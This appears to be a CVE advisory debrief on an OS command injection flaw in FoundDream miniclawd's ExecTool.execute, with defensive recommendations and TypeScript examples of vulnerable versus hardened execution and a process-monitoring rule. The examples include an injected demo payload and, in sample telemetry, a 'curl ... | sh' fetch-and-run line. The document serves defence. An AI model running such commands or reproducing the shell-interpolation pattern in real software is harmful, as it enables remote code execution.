PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-9452 FoundDream CVE debrief

A command injection vulnerability exists in FoundDream miniclawd, affecting the ExecTool.execute function in /src/tools/exec.ts. It allows remote attackers to execute arbitrary operating system commands on the host running the tool. The issue was reported to the project through a GitHub issue but remains unaddressed; no fix commit is available. The affected code is present in commits up to 2d65665046e2222eeea76cafc8570ed546a8c125. The project does not use formal versioning, so affected releases cannot be identified precisely; treat every checkout at or before that commit as affected.

Vendor
FoundDream
Product
miniclawd
CVSS
MEDIUM 5.5
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-25
Original CVE updated
2026-05-26
Advisory published
2026-05-25
Advisory updated
2026-05-26

Who should care

Organizations running FoundDream miniclawd deployments, particularly those exposing the tool to untrusted input or network-accessible interfaces. Security teams monitoring for command injection vulnerabilities in TypeScript/Node.js applications.

Technical summary

The ExecTool.execute function in /src/tools/exec.ts fails to sanitize user-controlled input before passing it to an operating system command execution function. Because the input reaches a shell, an attacker can append shell operators (command separators, pipes, command substitution) to crafted input and run commands of their choosing with the privileges of the miniclawd process. The vulnerability is remotely exploitable without authentication. The CVSS 4.0 score of 5.5 (MEDIUM) reflects a network attack vector, low attack complexity, no privileges required and no user interaction, with the impact rated low for confidentiality, integrity and availability of the vulnerable system. Exploit details are public (the GitHub issue is open), which raises the likelihood of active exploitation.
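The two patterns below, as an added TypeScript example that is not miniclawd's code: the injection-prone shape (a caller-controlled string interpolated into a shell command line) next to the hardened shape (binary and arguments passed as an array to execFile, plus an allowlist and an option-argument check). The function and constant names, the allowlist contents and the request shape are assumptions for illustration; the demo assumes a POSIX /bin/sh and an `echo` binary.

```typescript
// Added example, not miniclawd's code. Function names, the allowlist and the
// ExecRequest shape are hypothetical. Assumes POSIX sh and an echo binary.
import { execSync, execFileSync } from "child_process";

// Hypothetical allowlist of binaries the tool is actually meant to run.
const ALLOWED_COMMANDS = new Set(["echo", "ls", "cat"]);

// VULNERABLE pattern (CWE-78): the caller's text is pasted into a command line
// that /bin/sh parses, so ";", "&&", "|", "$(...)" and backticks all execute.
function runViaShell(userInput: string): string {
  return execSync(`echo ${userInput}`, { encoding: "utf8" });
}

// HARDENED pattern: binary and arguments are passed as an array to execFile,
// so no shell ever sees userInput; metacharacters stay literal bytes.
function runViaExecFile(userInput: string): string {
  return execFileSync("echo", [userInput], { encoding: "utf8" });
}

interface ExecRequest {
  command: string;
  args: string[];
}

// Validation for a tool that accepts a structured request: returns an error
// message, or null when the request is acceptable.
function validateExecRequest(req: ExecRequest): string | null {
  if (!ALLOWED_COMMANDS.has(req.command)) {
    return `command not allowed: ${req.command}`;
  }
  if (!Array.isArray(req.args) || req.args.some((a) => typeof a !== "string")) {
    return "args must be an array of strings";
  }
  // execFile stops shell injection, but an argument beginning with "-" can
  // still change program behaviour (e.g. "ls -R /"); refuse option-like
  // arguments unless a specific caller has a documented need for them.
  if (req.args.some((a) => a.startsWith("-"))) {
    return "option-like arguments are not permitted";
  }
  return null;
}

// Validate, then execute without a shell and with a timeout.
function executeRequest(req: ExecRequest): string {
  const err = validateExecRequest(req);
  if (err !== null) throw new Error(err);
  return execFileSync(req.command, req.args, { encoding: "utf8", timeout: 5000 });
}

// Demonstration of the difference on the same payload.
function demo(): { viaShell: string; viaExecFile: string } {
  const payload = "hello; echo INJECTED";
  return { viaShell: runViaShell(payload), viaExecFile: runViaExecFile(payload) };
}
```

With the payload `hello; echo INJECTED`, the shell path prints two lines because `; echo INJECTED` ran as a second command, while the execFile path prints the payload verbatim as a single argument. Passing an argument array is the structural fix; the allowlist and the option-argument check close the remaining paths by which a caller could still steer an allowed binary.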

Defensive priority

medium

Recommended defensive actions

  • Until a fix is available, do not expose ExecTool.execute (in /src/tools/exec.ts) to untrusted input; where the tool must stay reachable, restrict it to authenticated, trusted callers and run miniclawd under a low-privilege account
  • Validate input against an allowlist of permitted commands and arguments rather than trying to strip shell metacharacters
  • Execute commands with execFile or spawn and an argument array instead of building a shell command string; this removes the shell that interprets injected operators
  • Monitor for unexpected process spawning or shell activity from miniclawd deployments, in particular a shell started with -c by the Node.js process
  • Watch the GitHub repository for a fix commit and security updates, since the project has no formal releases to pin to
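The monitoring item above, as an added TypeScript example that is not miniclawd's or any vendor's code: a small rule that scans process-creation events for a shell started with `-c` by a Node.js parent and raises the severity when the command line carries chaining or substitution operators. The event schema, field names and the sample events are constructed for this example; real telemetry (auditd, eBPF tracers, EDR process events) will use different field names.

```typescript
// Added example, not miniclawd's code. Event schema, rule names and sample
// events are constructed for illustration.
interface ProcEvent {
  ts: string;
  parentComm: string; // executable name of the parent process
  comm: string;       // executable name of the newly created process
  argv: string[];     // argument vector of the new process
  cwd: string;
}

interface Alert {
  ts: string;
  severity: "info" | "high";
  reason: string;
  commandLine: string;
}

const SHELLS = new Set(["sh", "bash", "dash", "zsh"]);
// Operators a single legitimate tool invocation should not need.
const INJECTION_PATTERN = /(;|&&|\|\||\||`|\$\(|\n)/;

// Returns an alert for one event, or null when nothing is suspicious.
function inspectEvent(ev: ProcEvent): Alert | null {
  // Scope: children of the tool's runtime (assumed to run as "node").
  if (ev.parentComm !== "node") return null;
  if (!SHELLS.has(ev.comm) || ev.argv[1] !== "-c") return null;
  const commandLine = ev.argv.join(" ");
  const script = ev.argv.slice(2).join(" ");
  // A shell with -c is the exec-through-shell shape behind this CVE; by itself
  // that is informational, but chaining or substitution inside the script
  // points at injected input.
  if (INJECTION_PATTERN.test(script)) {
    return { ts: ev.ts, severity: "high", reason: "shell -c with command chaining or substitution", commandLine };
  }
  return { ts: ev.ts, severity: "info", reason: "shell spawned by node", commandLine };
}

function scanEvents(events: ProcEvent[]): Alert[] {
  return events.map(inspectEvent).filter((a): a is Alert => a !== null);
}

// Constructed sample telemetry, not real captures.
const SAMPLE_EVENTS: ProcEvent[] = [
  { ts: "2026-05-25T10:00:01Z", parentComm: "node", comm: "ls", argv: ["ls", "-la", "/srv/app"], cwd: "/srv/app" },
  { ts: "2026-05-25T10:00:02Z", parentComm: "node", comm: "sh", argv: ["sh", "-c", "ls -la /srv/app"], cwd: "/srv/app" },
  { ts: "2026-05-25T10:00:03Z", parentComm: "node", comm: "sh", argv: ["sh", "-c", "ls /tmp; curl http://198.51.100.7/x | sh"], cwd: "/srv/app" },
  { ts: "2026-05-25T10:00:04Z", parentComm: "sshd", comm: "bash", argv: ["bash", "-c", "id; uname -a"], cwd: "/root" },
];

function runDemo(): Alert[] {
  return scanEvents(SAMPLE_EVENTS);
}
```

On the sample events the direct `ls` and the sshd-spawned shell are ignored, the plain `sh -c ls -la /srv/app` produces an informational alert (the tool is executing through a shell at all), and the event with `;` and `|` produces a high-severity alert. Tune the parent-process filter to how miniclawd is actually launched in your environment.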

Evidence notes

Vulnerability disclosed via VulDB with a public GitHub issue report. CVE published 2026-05-25, modified 2026-05-26. The CVSS 4.0 vector indicates a network attack vector with low attack complexity, no privileges required and no user interaction. CWE-77 (improper neutralization of special elements used in a command) and CWE-78 (OS command injection) are identified as the primary weakness types.
